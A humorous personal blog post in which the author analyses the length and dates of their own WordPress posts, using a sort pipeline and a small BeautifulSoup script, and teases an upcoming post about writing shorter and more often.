That list was compiled by the command cat blogtimes.csv | sort -t',' -k3n | tail, and that’s quite an accomplishment because I had to look up the arguments for the sort command in order to figure that out. Of course, blogtimes.csv is the output of my magical six line python script (which uses BeautifulSoup to extract all the wp:post_dates).
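
(For the record, the extraction half of that pipeline was roughly the following shape. This is a reconstruction rather than the original six lines, and the export filename is an assumption.)

# pull every wp:post_date out of the WordPress export XML and print epoch/date pairs
import time
from bs4 import BeautifulSoup

soup = BeautifulSoup(open("wordpress-export.xml").read(), "html.parser")
for tag in soup.find_all("wp:post_date"):
    date = tag.get_text().strip()                      # e.g. "2012-06-19 19:25:57"
    epoch = time.mktime(time.strptime(date, "%Y-%m-%d %H:%M:%S"))
    print(epoch, ",", date)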

So, of the 10 blog posts in that list, 8 of them happened during or after 2011 and 3 of them happened in 2012. Considering that there were 10 things published in 2012 (according to my dataset) and 21 in 2011, that means a rather significant fraction of the stuff written recently is insanely long.

WordPress tells me this post is now at 948 words, so I guess I’ll add a bit of a conclusion at the end to push it over the magical power-of-ten barrier, so presumably you should brace for the terrible boom which occurs at that point (oh, what’s that? I think that’s my imaginary telephone operator, who informs me when I make a factual error; apparently those kinds of booms only happen with waves, and apparently words flowing through word-count orders of magnitude don’t count).

The original title of this post was “Meta Analytics & Upcoming Changes”, but in the spirit of the upcoming changes, I’ve moved the “Upcoming Changes” part into its own post (tentatively titled “Upcoming Changes”). You can probably at this point guess that “Upcoming Changes” involves something to tackle the excessive verbosity and to mitigate the absurdly infrequent posts. This probably doesn’t sound nearly as heroic to you as it does to me, because I’m listening to The Avengers soundtrack right now, and “A Promise” is pretty dramatic.